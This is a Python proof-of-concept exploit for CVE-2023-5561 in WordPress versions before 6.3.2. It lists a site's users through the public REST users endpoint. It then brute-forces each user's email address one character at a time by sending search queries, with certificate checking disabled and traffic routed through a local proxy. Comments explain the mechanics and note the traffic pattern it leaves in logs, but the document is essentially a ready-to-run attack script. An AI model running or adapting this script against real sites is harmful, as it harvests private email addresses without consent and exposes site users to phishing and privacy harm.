CVE-2023-5561
import requests | |
import string | |
import warnings | |
import json | |
import argparse | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
# Silence the urllib3 warning that every `verify=False` request below would
# otherwise emit; certificate validation itself stays disabled for all calls.
warnings.simplefilter('ignore', InsecureRequestWarning)

# Every request in this file is routed through a local intercepting proxy on
# port 8080 (Burp-style); with `verify=False` the script accepts whatever
# certificate that proxy presents. Requests fail if nothing listens there.
proxy = {
    "http": "127.0.0.1:8080",
    "https": "127.0.0.1:8080"
}
def init() -> None:
    """Parse the command line and hand the parsed namespace to exploit().

    The only argument is `-u/--host`, the base URL of the WordPress site; the
    description string records the affected range (WordPress before 6.3.2),
    so the mitigation is simply upgrading past that release.
    """
    parser = argparse.ArgumentParser(description='WP < 6.3.2 – Unauthenticated Post Author Email Disclosure CVE-2023-5561')
    # `host` is used verbatim as a URL prefix, so it must include the scheme.
    parser.add_argument('-u', '--host', help='Host', type=str, required=True)
    args = parser.parse_args()
    exploit(args)
def exploit(args: argparse.Namespace) -> None:
    """Enumerate users via the REST API, then recover each one's e-mail.

    Args:
        args: parsed namespace; only `args.host` (site base URL) is read.

    Output goes to stdout only; nothing is returned. From the server side the
    whole run is one unauthenticated GET to /wp-json/wp/v2/users followed by a
    burst of GETs to the same endpoint with `?search=` — a pattern that is easy
    to rate-limit or alert on.
    """
    host = args.host
    users = extract_users(host)
    print("[+] Total users: " + str(len(users)))
    if len(users) > 0:
        print("[+] Extracting emails...")
        for user in users:
            email = extract_email(host, user)
            print("[+] " + user + ": " + email)
    else:
        # An empty list covers both "no public authors" and a disabled /
        # restricted REST API; extract_users() does not distinguish the two.
        print("[-] No users found or rest api not enabled")
def extract_users(host: str) -> list[str]:
    """Return the `slug` of every user listed by the public users endpoint.

    Args:
        host: site base URL, including scheme, without a trailing slash.

    Returns:
        List of user slugs in the order the API returned them.

    Raises:
        json.JSONDecodeError if the body is not JSON (e.g. an HTML error
        page); TypeError if the JSON is not a list of objects — a REST error
        object ({"code": ...}) will hit this, there is no status-code check.
    """
    wp_users = []
    url = host + "/wp-json/wp/v2/users"
    # Unauthenticated listing of authors; sites that restrict this endpoint
    # (or return an error object) are treated as "no users" by the caller.
    r = requests.get(url, verify=False, proxies=proxy)
    # Some hosts prefix the JSON body with a UTF-8 BOM; round-tripping through
    # 'utf-8-sig' strips it before parsing.
    text_without_bom = r.text.encode().decode('utf-8-sig')
    result_json = json.loads(text_without_bom)
    for user in result_json:
        wp_users.append(user['slug'])
    return wp_users
def extract_email(host: str, user: str) -> str:
    """Recover one user's e-mail address one character at a time.

    The probe relies on the `search` parameter of /wp-json/wp/v2/users
    matching against the e-mail field for unauthenticated callers (the
    behaviour named in the CVE title; it is not checked here). A candidate is
    accepted when the response is not the empty list and contains `user`
    (substring test on the raw body, so a slug that is a substring of another
    matching user's data would also pass).

    Stage 1 grows the address rightwards from "@"; stage 2 then grows it
    leftwards from the recovered suffix. Each stage stops at the first pass
    in which no candidate character extends the match. Only lowercase ASCII
    letters, digits and `._-` are tried, so addresses containing any other
    character are truncated at that point.

    Args:
        host: site base URL, including scheme.
        user: user slug as returned by extract_users().

    Returns:
        The longest string recovered; at minimum "@" if nothing matched.

    Server-side this is up to len(charset) requests per recovered character,
    all to the same URL prefix with a `search=` value that grows by one
    character per hit — a distinctive sequence in access logs.
    """
    print("[+] User: " + user)
    print("[+] Stage 1 - Extracting email suffix...")
    url = host + "/wp-json/wp/v2/users?search="
    stage1 = "@"
    restart = True
    while restart:
        restart = False
        for i in string.ascii_lowercase + string.digits + "._-":
            payload = stage1 + i
            # `payload` is appended to the URL without percent-encoding; the
            # tried charset contains nothing that needs escaping.
            r = requests.get(url + payload, verify=False, proxies=proxy)
            text_without_bom = r.text.encode().decode('utf-8-sig')
            if text_without_bom != "[]":
                if user in text_without_bom:
                    restart = True
                    stage1 = payload
                    # First matching character wins; the remaining
                    # candidates for this position are never tried.
                    break
    print("[+] User found: " + user + " - " + stage1 + " - Extracting email...")
    print("[+] Stage 2 - Extracting email prefix...")
    restart = True
    stage2 = stage1
    while restart:
        restart = False
        for i in string.ascii_lowercase + string.digits + "._-":
            # Same loop as stage 1 but the candidate is prepended.
            payload = i + stage2
            r = requests.get(url + payload, verify=False, proxies=proxy)
            text_without_bom = r.text.encode().decode('utf-8-sig')
            if text_without_bom != "[]":
                if user in text_without_bom:
                    restart = True
                    stage2 = payload
                    break
    return stage2
# Script entry point: argument parsing and the whole run live in init().
if __name__ == "__main__":
    init()